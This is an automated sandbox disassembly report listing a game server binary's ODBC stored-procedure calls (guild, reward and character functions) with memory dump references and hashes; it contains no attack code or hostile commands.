                                                                                      • {? = CALL [ROHAN2_LeaveAllianceGuild](?, ?)}, xrefs: 0042DA40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_LeaveAllianceGuild](?, ?)}
                                                                                      • API String ID: 0-3909131061
                                                                                      • Opcode ID: b2f512f3439635d95be70ed67a53179b68cabf74755481462643789ed5511dda
                                                                                      • Instruction ID: 3d92e1527806c7bf433b1c0f27111eafbf261847805ddfcc6fd4ad22f9d30ed5
                                                                                      • Opcode Fuzzy Hash: b2f512f3439635d95be70ed67a53179b68cabf74755481462643789ed5511dda
                                                                                      • Instruction Fuzzy Hash: 262100B1641A14BBEB60CF44CC52FEB7774EB84B1DF208289F6186E2C4D6B569808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohangame_pLucky_GetReward] (?, ?)},000000FD), ref: 00441A4D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00441A99
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441AD6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 00441B0B
                                                                                      Strings
                                                                                      • { ? = CALL [Rohangame_pLucky_GetReward] (?, ?)}, xrefs: 00441A44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohangame_pLucky_GetReward] (?, ?)}
                                                                                      • API String ID: 0-750418725
                                                                                      • Opcode ID: 1c61e724e7b69f4888a9b7bcaadc115564811f0da2adafa9530e23bcfda08d96
                                                                                      • Instruction ID: 7e8fc1fdf12a594be7d7c1304a2362490e7df4550ecc350c43739b92ed5144a5
                                                                                      • Opcode Fuzzy Hash: 1c61e724e7b69f4888a9b7bcaadc115564811f0da2adafa9530e23bcfda08d96
                                                                                      • Instruction Fuzzy Hash: 8B21D0B1A40318BBEB288B44CC52FEA7335EB84B54F1042C9F7142E6C5DAB56F849F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWarRegister] (?,?)},000000FD), ref: 00433B20
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433B5F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433B94
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433BCC
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWarRegister] (?,?)}, xrefs: 00433B17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWarRegister] (?,?)}
                                                                                      • API String ID: 0-1851568374
                                                                                      • Opcode ID: 360e61c29caa700b2780ecc0d9dada16df1b2811c610aaa0c1e2c74da376b026
                                                                                      • Instruction ID: 010f98871887eec7c14b5c89c52f62c78055515775f51403276b8ab30b4734c3
                                                                                      • Opcode Fuzzy Hash: 360e61c29caa700b2780ecc0d9dada16df1b2811c610aaa0c1e2c74da376b026
                                                                                      • Instruction Fuzzy Hash: 662154B1B50714BBEB24CF58CC42F9A7374EB4DB24F108299F6186E6C0D5B5AD408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohangame_pLucky_InsReward] (?, ?)},000000FD), ref: 00441B29
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00441B75
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441BB2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 00441BE7
                                                                                      Strings
                                                                                      • { ? = CALL [Rohangame_pLucky_InsReward] (?, ?)}, xrefs: 00441B20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohangame_pLucky_InsReward] (?, ?)}
                                                                                      • API String ID: 0-2112128451
                                                                                      • Opcode ID: d560b7fc040cf7bd666cf5f9a5612629af73eb621b4821858bf518d1b08da985
                                                                                      • Instruction ID: 3fe04874b157dc53f39f6c13a11f58c1313dbc2aa003e11f7bdd960e9e087c95
                                                                                      • Opcode Fuzzy Hash: d560b7fc040cf7bd666cf5f9a5612629af73eb621b4821858bf518d1b08da985
                                                                                      • Instruction Fuzzy Hash: 2A21D3756403187BEB248B44CC52FEA7375EB84B14F108189F7192F6C5D6B56F418F68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_ChangeCharacterName] (?,?)},000000FD), ref: 00437971
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004379B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004379EB
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437A23
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_ChangeCharacterName] (?,?)}, xrefs: 00437968
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_ChangeCharacterName] (?,?)}
                                                                                      • API String ID: 0-4146091340
                                                                                      • Opcode ID: 049262089a7157bddde1c5c324ee43b56061f7da273de822a1339a442554c848
                                                                                      • Instruction ID: d8b1d48cb57fff32cd86ac664cd49647630fdf6df0c0f995381fea87b39b8893
                                                                                      • Opcode Fuzzy Hash: 049262089a7157bddde1c5c324ee43b56061f7da273de822a1339a442554c848
                                                                                      • Instruction Fuzzy Hash: 11210371681218BBFB249B54CD52FAA7335EB84B18F1083C9F71C6E3C5D9B56D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_MOVECharSTEP4] (?,?) },000000FD), ref: 00439146
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00439188
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004391BD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004391F5
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_MOVECharSTEP4] (?,?) }, xrefs: 0043913D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_MOVECharSTEP4] (?,?) }
                                                                                      • API String ID: 0-1438578261
                                                                                      • Opcode ID: 90cabdb522b3df3f719f8b2bfa904421e42c1c70d811b6ad4fe141bc93a92d25
                                                                                      • Instruction ID: 383e45d81216f457282d0b7013b86ab3737f9406bd29022e66a031bedc711fbf
                                                                                      • Opcode Fuzzy Hash: 90cabdb522b3df3f719f8b2bfa904421e42c1c70d811b6ad4fe141bc93a92d25
                                                                                      • Instruction Fuzzy Hash: 4F21EFB1690214BBEB208B94CC52FA97334EB44B14F10C28BF6186F2C4D9B57D408F78
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetRareItemCountByType] (?,?)},000000FD), ref: 00438262
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004382A4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004382D9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438311
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetRareItemCountByType] (?,?)}, xrefs: 00438259
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetRareItemCountByType] (?,?)}
                                                                                      • API String ID: 0-3616157914
